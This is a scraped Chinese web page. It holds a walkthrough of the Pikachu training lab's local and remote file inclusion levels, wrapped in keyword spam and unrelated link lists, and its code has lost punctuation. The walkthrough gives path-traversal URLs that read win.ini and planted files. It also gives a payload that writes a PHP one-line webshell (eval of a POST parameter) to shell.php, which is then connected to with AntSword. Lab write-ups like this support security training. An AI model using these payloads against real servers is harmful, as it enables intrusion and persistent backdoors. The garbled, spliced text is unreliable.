当前位置: 首页 > news >正文

男的做直播网站好昆明网站运营公司有哪些

男的做直播网站好,昆明网站运营公司有哪些,wordpress error 500,制作社交app的网站参考借鉴 Pikachu靶场之文件包含漏洞详解_pikachu文件包含-CSDN博客 文件包含#xff08;CTF教程#xff0c;Web安全渗透入门#xff09;__bilibili File Inclusion(local) 查找废弃隐藏文件 随机选一个然后提交查询 URL中出现filenamefile2.php filename是file2.phpCTF教程Web安全渗透入门__bilibili File Inclusion(local)  查找废弃隐藏文件 随机选一个然后提交查询 URL中出现filenamefile2.php filename是file2.php其他文件名可能是filex.phpx是数字 发现文件名确实是file1.php~file5.php 这套文件里可能有废弃或者隐藏的文件用burpsuite进行爆破 爆破位置设置为文件名中的数字 payload设置为Numbers从6到100步长为1然后攻击 不同长度的结果有三个分别代表file6.php、file7.php、file10.php 把上面四个文件名都在浏览器地址栏试一下 发现file6.php是个包含用户名和密码的隐藏文件 file7.php返回了报错通过这个报错可以知道文件包含的函数是include()以及包含的文件路径file10.php也是如此 读取不同文件夹文件 由上图可以看出网站根目录是E:\phpStudy\phpstudy_pro\WWW\      在此目录下写入一个shell.txt格式的php代码 内容为? phpinfo();? 由于路径参数中有个固定的include/因此就不能用绝对路径结合报错信息中泄露的结合报错信息中泄露的fi_local.php文件位置算出相对路径为 ../../../shell.txt payload http://127.0.0.1/vul/fileinclude/fi_local.php?filename../../../shell.txtsubmit提交查询 成功读取文件  读取系统文件 结合报错信息中泄露的fi_local.php文件位置算出相对路径为 C:/../../../../windows/win.ini payload http://127.0.0.1/vul/fileinclude/fi_local.php?filenameC:/../../../../Windows/win.inisubmit提交查询 成功读取文件  File Inclusion(remote) allow_url_includeOn 修改该目录下的文件  phpstudy_pro\Extensions\php\php7.3.4nts\php.ini 修改文件 重启服务  测试本地文件包含 发现url中把include()函数的完整参数给出来了所以除了远程文件包含 还可以本地文件包含使用绝对路径 将filename更改为上一关创建的shell.txt的绝对路径 成功读取文件 包含有木马的文件 在fi_remote.php文件的同级目录下新建一个文件shell.php并将一句话木马写入shell.php将上题添加的shell.txt的文件内容更改为 ?php fputs(fopen(shell.php,w),?php eval($_POST[caker])  ? ); ? payload http://127.0.0.1/vul/fileinclude/fi_remote.php?filenameE:\phpStudy\phpstudy_pro\WWW\shell.txtsubmit提交查询 没有回显  目录查看发现shell.php已经写入 可以用蚁剑进行连接
http://www.hkea.cn/news/14353159/

相关文章:

  • 合肥建网站公司地址快速网站开发 带数据库
  • 南昌模板建站定制网站政务网站建设及管理
  • 成都网站建设哪家强自己做电影网站有没有钱赚
  • 怎么做自己优惠券网站个人网页设计说明模板
  • 郑州网站设计专家团队网站模板
  • 网站设计任务新浪sae可以做网站么
  • php网站如何绑定一级域名到子目录郴州建设工程信息网站
  • 网站视频解析网站建设与网络编辑课程心得
  • 天津艺匠做网站怎么样惠州seo怎么做
  • 贵州交通建设集团有限公司网站网站设计尺寸规范
  • 小程序 微网站做怎样的网站能赚钱
  • 成都学校网站建设公司用html做网站源代码
  • 做众筹的网站唐山市做网站
  • 晋城市住房保障和城乡建设局网站网络机房建设方案
  • 在网站做电子画册网站怎么接广告赚钱
  • 企迪网沈阳seo优化
  • 网站admin密码忘记了怎么办两个wordpress联通
  • 黄岛开发区做网站的公司百度开发者中心
  • 电商网站有哪些官网网站有后台更新不了
  • 效益型网站建立简单网站
  • seo 网站 结构整站营销系统
  • 阜阳网站建设云平台做网站是怎样赚钱的
  • 怎么自己设计logoseo优化包括什么
  • 建设银行网站怎么看交易记录手机做任务网站
  • 在机关网站建设会上讲话英文版wordpress如何转换
  • 班级网站的建设调查表简单网站建设的费用
  • 网站建设中主页指的是建设网站基础
  • 公司网站的建设与运营管理制度企业网站收录
  • 大型网站建设方案常见问题wordpress插件改图标
  • iis 网站制作阳江打卡网红店